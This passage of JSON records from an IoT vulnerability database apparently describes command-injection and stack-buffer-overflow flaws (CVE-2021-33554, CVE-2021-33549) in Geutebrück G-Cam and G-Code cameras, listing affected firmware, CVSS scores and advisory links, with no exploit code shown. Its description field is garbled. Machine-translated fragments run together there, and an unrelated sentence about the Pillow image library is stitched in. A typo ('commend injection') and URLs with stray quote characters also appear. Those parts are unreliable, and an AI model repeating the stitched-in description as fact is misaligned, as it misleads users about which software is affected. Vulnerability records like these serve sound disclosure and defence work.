          },
          {
            "db": "VULMON",
            "id": "CVE-2021-33554"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-002023"
          },
          {
            "db": "PACKETSTORM",
            "id": "164036"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202107-2084"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202104-975"
          },
          {
            "db": "NVD",
            "id": "CVE-2021-33554"
          }
        ]
      },
      "id": "VAR-202109-0850",
      "iot": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": true,
        "sources": [
          {
            "db": "OTHER",
            "id": null
          }
        ],
        "trust": 0.01
      },
      "iot_taxonomy": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "category": [
              "camera device"
            ],
            "sub_category": "camera",
            "trust": 0.1
          }
        ],
        "sources": [
          {
            "db": "OTHER",
            "id": null
          }
        ]
      },
      "last_update_date": "2025-01-30T20:43:15.595000Z",
      "patch": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/patch#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "title": "GEUTEBRUCK \u2019 s\u00a0web\u00a0portal\u00a0 (Login required)",
            "trust": 0.8,
            "url": "https://portal.geutebrueck.com/"
          },
          {
            "title": "Geutebr\u00fcck G-Cam E2 and G-Code Fixes for command injection vulnerabilities",
            "trust": 0.6,
            "url": "http://123.124.177.30/web/xxk/bdxqById.tag?id=158064"
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-002023"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202107-2084"
          }
        ]
      },
      "problemtype_data": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "problemtype": "CWE-78",
            "trust": 1.0
          },
          {
            "problemtype": "Command injection (CWE-77) [ Other ]",
            "trust": 0.8
          },
          {
            "problemtype": " Stack-based buffer overflow (CWE-121) [ Other ]",
            "trust": 0.8
          },
          {
            "problemtype": " Lack of authentication for important features (CWE-306) [ Other ]",
            "trust": 0.8
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-002023"
          },
          {
            "db": "NVD",
            "id": "CVE-2021-33554"
          }
        ]
      },
      "references": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/references#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "trust": 2.2,
            "url": "https://us-cert.cisa.gov/ics/advisories/icsa-21-208-03"
          },
          {
            "trust": 1.6,
            "url": "https://www.randorisec.fr/fr/udp-technology-ip-camera-vulnerabilities/"
          },
          {
            "trust": 0.8,
            "url": "https://jvn.jp/vu/jvnvu97817785/"
          },
          {
            "trust": 0.8,
            "url": "https://us-cert.cisa.gov/ics/advisories/icsa-21-208-05"
          },
          {
            "trust": 0.7,
            "url": "https://packetstormsecurity.com/files/164036/geutebruck-remote-command-execution.html"
          },
          {
            "trust": 0.7,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2021-33554"
          },
          {
            "trust": 0.6,
            "url": "https://www.auscert.org.au/bulletins/esb-2021.2550"
          },
          {
            "trust": 0.6,
            "url": "https://www.cybersecurity-help.cz/vdb/sb2021072807"
          },
          {
            "trust": 0.6,
            "url": "https://cxsecurity.com/issue/wlb-2021090031"
          },
          {
            "trust": 0.6,
            "url": "https://www.cybersecurity-help.cz/vdb/sb2021041363"
          },
          {
            "trust": 0.1,
            "url": "https://ieeexplore.ieee.org/abstract/document/10769424"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2021-33543"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2021-33553"
          },
          {
            "trust": 0.1,
            "url": "https://github.com/rapid7/metasploit-framework"
          },
          {
            "trust": 0.1,
            "url": "https://www.randorisec.fr/udp-technology-ip-camera-vulnerabilities/\u0027],"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2021-33544"
          },
          {
            "trust": 0.1,
            "url": "https://us-cert.cisa.gov/ics/advisories/icsa-21-208-03\u0027]"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2021-33551"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2021-33548"
          },
          {
            "trust": 0.1,
            "url": "https://metasploit.com/download"
          },
          {
            "trust": 0.1,
            "url": "http://geutebruck.com\u0027"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2021-33550"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2021-33552"
          }
        ],
        "sources": [
          {
            "db": "OTHER",
            "id": null
          },
          {
            "db": "VULMON",
            "id": "CVE-2021-33554"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-002023"
          },
          {
            "db": "PACKETSTORM",
            "id": "164036"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202107-2084"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202104-975"
          },
          {
            "db": "NVD",
            "id": "CVE-2021-33554"
          }
        ]
      },
      "sources": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "db": "OTHER",
            "id": null
          },
          {
            "db": "VULMON",
            "id": "CVE-2021-33554"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-002023"
          },
          {
            "db": "PACKETSTORM",
            "id": "164036"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202107-2084"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202104-975"
          },
          {
            "db": "NVD",
            "id": "CVE-2021-33554"
          }
        ]
      },
      "sources_release_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2021-07-29T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2021-002023"
          },
          {
            "date": "2021-09-02T15:36:40",
            "db": "PACKETSTORM",
            "id": "164036"
          },
          {
            "date": "2021-07-27T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-202107-2084"
          },
          {
            "date": "2021-04-13T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-202104-975"
          },
          {
            "date": "2021-09-13T18:15:23.730000",
            "db": "NVD",
            "id": "CVE-2021-33554"
          }
        ]
      },
      "sources_update_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2021-07-29T08:30:00",
            "db": "JVNDB",
            "id": "JVNDB-2021-002023"
          },
          {
            "date": "2022-10-08T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-202107-2084"
          },
          {
            "date": "2021-04-14T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-202104-975"
          },
          {
            "date": "2023-11-07T03:35:52.423000",
            "db": "NVD",
            "id": "CVE-2021-33554"
          }
        ]
      },
      "threat_type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "remote",
        "sources": [
          {
            "db": "PACKETSTORM",
            "id": "164036"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202107-2084"
          }
        ],
        "trust": 0.7
      },
      "title": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/title#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "GEUTEBRUCK\u00a0 Made \u00a0G-Cam\u00a0E2\u00a0 and \u00a0G-Code\u00a0 Multiple vulnerabilities in",
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-002023"
          }
        ],
        "trust": 0.8
      },
      "type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "operating system commend injection",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-202107-2084"
          }
        ],
        "trust": 0.6
      }
    }

    VAR-202109-0858

    Vulnerability from variot - Updated: 2025-01-30 20:43

    Multiple camera devices by UDP Technology, Geutebrück and other vendors are vulnerable to a stack-based buffer overflow condition in the action parameter, which may allow an attacker to remotely execute arbitrary code. GEUTEBRUCK Provided by the company G-Cam E2 and G-Code The following multiple vulnerabilities exist in. * Lack of authentication for important features (CWE-306) - CVE-2021-33543 ‥ * Command injection (CWE-77) - CVE-2021-33544 , CVE-2021-33548 , CVE-2021-33550 , CVE-2021-33551 , CVE-2021-33552 , CVE-2021-33553 , CVE-2021-33554 ‥ * Stack-based buffer overflow (CWE-121) - CVE-2021-33545 , CVE-2021-33546 , CVE-2021-33547 , CVE-2021-33549The expected impact depends on each vulnerability, but it may be affected as follows. Pillow is a Python-based image processing library. There is currently no information about this vulnerability, please feel free to follow CNNVD or manufacturer announcements

    Show details on source website

    {
      "@context": {
        "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
        "affected_products": {
          "@id": "https://www.variotdbs.pl/ref/affected_products"
        },
        "configurations": {
          "@id": "https://www.variotdbs.pl/ref/configurations"
        },
        "credits": {
          "@id": "https://www.variotdbs.pl/ref/credits"
        },
        "cvss": {
          "@id": "https://www.variotdbs.pl/ref/cvss/"
        },
        "description": {
          "@id": "https://www.variotdbs.pl/ref/description/"
        },
        "exploit_availability": {
          "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
        },
        "external_ids": {
          "@id": "https://www.variotdbs.pl/ref/external_ids/"
        },
        "iot": {
          "@id": "https://www.variotdbs.pl/ref/iot/"
        },
        "iot_taxonomy": {
          "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
        },
        "patch": {
          "@id": "https://www.variotdbs.pl/ref/patch/"
        },
        "problemtype_data": {
          "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
        },
        "references": {
          "@id": "https://www.variotdbs.pl/ref/references/"
        },
        "sources": {
          "@id": "https://www.variotdbs.pl/ref/sources/"
        },
        "sources_release_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
        },
        "sources_update_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
        },
        "threat_type": {
          "@id": "https://www.variotdbs.pl/ref/threat_type/"
        },
        "title": {
          "@id": "https://www.variotdbs.pl/ref/title/"
        },
        "type": {
          "@id": "https://www.variotdbs.pl/ref/type/"
        }
      },
      "@id": "https://www.variotdbs.pl/vuln/VAR-202109-0858",
      "affected_products": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "model": "g-code een-2010",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.14.5"
          },
          {
            "model": "g-cam ebc-2110",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam ebc-2112",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.27"
          },
          {
            "model": "g-cam efd-2250",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam ewpc-2275",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.27"
          },
          {
            "model": "g-code een-2040",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam ewpc-2271",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam ebc-2111",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam ethc-2239",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam ethc-2230",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.14.5"
          },
          {
            "model": "g-cam ethc-2249",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.14.5"
          },
          {
            "model": "g-code een-2010",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam efd-2241",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.14.5"
          },
          {
            "model": "g-cam ebc-2110",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.27"
          },
          {
            "model": "g-code een-2040",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.27"
          },
          {
            "model": "g-cam ewpc-2271",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.27"
          },
          {
            "model": "g-cam ebc-2111",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.27"
          },
          {
            "model": "g-cam ethc-2239",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.27"
          },
          {
            "model": "g-cam efd-2250",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.27"
          },
          {
            "model": "g-cam ethc-2249",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam ethc-2230",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam ewpc-2270",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.14.5"
          },
          {
            "model": "g-code eec-2400",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.14.5"
          },
          {
            "model": "g-code een-2010",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.27"
          },
          {
            "model": "g-cam efd-2241",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam ethc-2240",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.14.5"
          },
          {
            "model": "g-cam efd-2251",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.14.5"
          },
          {
            "model": "g-cam ethc-2230",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.27"
          },
          {
            "model": "g-cam efd-2241",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.27"
          },
          {
            "model": "g-code eec-2400",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam ewpc-2270",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam ethc-2249",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.27"
          },
          {
            "model": "g-code eec-2400",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.27"
          },
          {
            "model": "g-cam ethc-2240",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam efd-2251",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam ewpc-2275",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.14.5"
          },
          {
            "model": "g-cam ebc-2112",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.14.5"
          },
          {
            "model": "g-cam ewpc-2270",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.27"
          },
          {
            "model": "g-cam ewpc-2275",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam ebc-2110",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.14.5"
          },
          {
            "model": "g-cam efd-2250",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.14.5"
          },
          {
            "model": "g-cam efd-2251",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.27"
          },
          {
            "model": "g-cam ethc-2240",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.27"
          },
          {
            "model": "g-code een-2040",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.14.5"
          },
          {
            "model": "g-cam ebc-2112",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam ewpc-2271",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.14.5"
          },
          {
            "model": "g-cam ebc-2111",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.14.5"
          },
          {
            "model": "g-cam ethc-2239",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.14.5"
          },
          {
            "model": "",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "geutebruck",
            "version": "\u2025 * firmware    1.12.13.2    1.12.14.5"
          },
          {
            "model": "",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "geutebruck",
            "version": "* een-20xx"
          },
          {
            "model": "",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "geutebruck",
            "version": "* efd-22xx"
          },
          {
            "model": "",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "geutebruck",
            "version": "* ethc-22xx"
          },
          {
            "model": "",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "geutebruck",
            "version": "\u2025 * g-cam"
          },
          {
            "model": "",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "geutebruck",
            "version": "* eec-2xx"
          },
          {
            "model": "",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "geutebruck",
            "version": "works with the above firmware  s  e2 series camera models   encoders"
          },
          {
            "model": "",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "geutebruck",
            "version": null
          },
          {
            "model": "",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "geutebruck",
            "version": "* ebc-21xx"
          },
          {
            "model": "",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "geutebruck",
            "version": "\u2025 * g-code"
          },
          {
            "model": "",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "geutebruck",
            "version": "( multiple products )"
          },
          {
            "model": "",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "geutebruck",
            "version": "* ewpc-22xx"
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-002023"
          },
          {
            "db": "NVD",
            "id": "CVE-2021-33549"
          }
        ]
      },
      "credits": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/credits#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Titouan Lazard and Ibrahim Ayadhi from RandoriSec reported these vulnerabilities to CISA.",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-202107-2088"
          }
        ],
        "trust": 0.6
      },
      "cve": "CVE-2021-33549",
      "cvss": {
        "@context": {
          "cvssV2": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
          },
          "cvssV3": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
          },
          "severity": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/cvss/severity#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/severity"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "cvssV2": [
              {
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "SINGLE",
                "author": "nvd@nist.gov",
                "availabilityImpact": "PARTIAL",
                "baseScore": 6.5,
                "confidentialityImpact": "PARTIAL",
                "exploitabilityScore": 8.0,
                "id": "CVE-2021-33549",
                "impactScore": 6.4,
                "integrityImpact": "PARTIAL",
                "severity": "MEDIUM",
                "trust": 1.1,
                "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P",
                "version": "2.0"
              }
            ],
            "cvssV3": [
              {
                "attackComplexity": "LOW",
                "attackVector": "NETWORK",
                "author": "nvd@nist.gov",
                "availabilityImpact": "HIGH",
                "baseScore": 7.2,
                "baseSeverity": "HIGH",
                "confidentialityImpact": "HIGH",
                "exploitabilityScore": 1.2,
                "id": "CVE-2021-33549",
                "impactScore": 5.9,
                "integrityImpact": "HIGH",
                "privilegesRequired": "HIGH",
                "scope": "UNCHANGED",
                "trust": 2.0,
                "userInteraction": "NONE",
                "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
                "version": "3.1"
              },
              {
                "attackComplexity": "Low",
                "attackVector": "Network",
                "author": "OTHER",
                "availabilityImpact": "High",
                "baseScore": 7.2,
                "baseSeverity": "High",
                "confidentialityImpact": "High",
                "exploitabilityScore": null,
                "id": "JVNDB-2021-002023",
                "impactScore": null,
                "integrityImpact": "High",
                "privilegesRequired": "High",
                "scope": "Unchanged",
                "trust": 0.8,
                "userInteraction": "None",
                "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
                "version": "3.0"
              }
            ],
            "severity": [
              {
                "author": "nvd@nist.gov",
                "id": "CVE-2021-33549",
                "trust": 1.0,
                "value": "HIGH"
              },
              {
                "author": "info@cert.vde.com",
                "id": "CVE-2021-33549",
                "trust": 1.0,
                "value": "HIGH"
              },
              {
                "author": "OTHER",
                "id": "JVNDB-2021-002023",
                "trust": 0.8,
                "value": "High"
              },
              {
                "author": "CNNVD",
                "id": "CNNVD-202104-975",
                "trust": 0.6,
                "value": "MEDIUM"
              },
              {
                "author": "CNNVD",
                "id": "CNNVD-202107-2088",
                "trust": 0.6,
                "value": "HIGH"
              },
              {
                "author": "VULMON",
                "id": "CVE-2021-33549",
                "trust": 0.1,
                "value": "MEDIUM"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "VULMON",
            "id": "CVE-2021-33549"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-002023"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202104-975"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202107-2088"
          },
          {
            "db": "NVD",
            "id": "CVE-2021-33549"
          },
          {
            "db": "NVD",
            "id": "CVE-2021-33549"
          }
        ]
      },
      "description": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/description#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Multiple camera devices by UDP Technology, Geutebr\u00fcck and other vendors are vulnerable to a stack-based buffer overflow condition in the action parameter, which may allow an attacker to remotely execute arbitrary code. GEUTEBRUCK Provided by the company G-Cam E2 and G-Code The following multiple vulnerabilities exist in. * Lack of authentication for important features (CWE-306) - CVE-2021-33543 \u2025 * Command injection (CWE-77) - CVE-2021-33544 , CVE-2021-33548 , CVE-2021-33550 , CVE-2021-33551 , CVE-2021-33552 , CVE-2021-33553 , CVE-2021-33554 \u2025 * Stack-based buffer overflow (CWE-121) - CVE-2021-33545 , CVE-2021-33546 , CVE-2021-33547 , CVE-2021-33549The expected impact depends on each vulnerability, but it may be affected as follows. Pillow is a Python-based image processing library. \nThere is currently no information about this vulnerability, please feel free to follow CNNVD or manufacturer announcements",
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2021-33549"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-002023"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202104-975"
          },
          {
            "db": "VULMON",
            "id": "CVE-2021-33549"
          }
        ],
        "trust": 2.25
      },
      "external_ids": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "db": "NVD",
            "id": "CVE-2021-33549",
            "trust": 2.6
          },
          {
            "db": "ICS CERT",
            "id": "ICSA-21-208-03",
            "trust": 1.7
          },
          {
            "db": "PACKETSTORM",
            "id": "164191",
            "trust": 1.7
          },
          {
            "db": "JVN",
            "id": "JVNVU97817785",
            "trust": 0.8
          },
          {
            "db": "ICS CERT",
            "id": "ICSA-21-208-05",
            "trust": 0.8
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-002023",
            "trust": 0.8
          },
          {
            "db": "CS-HELP",
            "id": "SB2021041363",
            "trust": 0.6
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202104-975",
            "trust": 0.6
          },
          {
            "db": "CS-HELP",
            "id": "SB2021072807",
            "trust": 0.6
          },
          {
            "db": "AUSCERT",
            "id": "ESB-2021.2550",
            "trust": 0.6
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202107-2088",
            "trust": 0.6
          },
          {
            "db": "OTHER",
            "id": "NONE",
            "trust": 0.1
          },
          {
            "db": "VULMON",
            "id": "CVE-2021-33549",
            "trust": 0.1
          }
        ],
        "sources": [
          {
            "db": "OTHER",
            "id": null
          },
          {
            "db": "VULMON",
            "id": "CVE-2021-33549"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-002023"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202104-975"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202107-2088"
          },
          {
            "db": "NVD",
            "id": "CVE-2021-33549"
          }
        ]
      },
      "id": "VAR-202109-0858",
      "iot": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": true,
        "sources": [
          {
            "db": "OTHER",
            "id": null
          }
        ],
        "trust": 0.01
      },
      "iot_taxonomy": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "category": [
              "camera device"
            ],
            "sub_category": "camera",
            "trust": 0.1
          }
        ],
        "sources": [
          {
            "db": "OTHER",
            "id": null
          }
        ]
      },
      "last_update_date": "2025-01-30T20:43:04.157000Z",
      "patch": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/patch#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "title": "GEUTEBRUCK \u2019 s\u00a0web\u00a0portal\u00a0 (Login required)",
            "trust": 0.8,
            "url": "https://portal.geutebrueck.com/"
          },
          {
            "title": "Multiple  Geutebr\u00fcck Repair measures for the error and vulnerability of the camera device buffer",
            "trust": 0.6,
            "url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=158068"
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-002023"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202107-2088"
          }
        ]
      },
      "problemtype_data": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "problemtype": "CWE-121",
            "trust": 1.0
          },
          {
            "problemtype": "Command injection (CWE-77) [ Other ]",
            "trust": 0.8
          },
          {
            "problemtype": " Stack-based buffer overflow (CWE-121) [ Other ]",
            "trust": 0.8
          },
          {
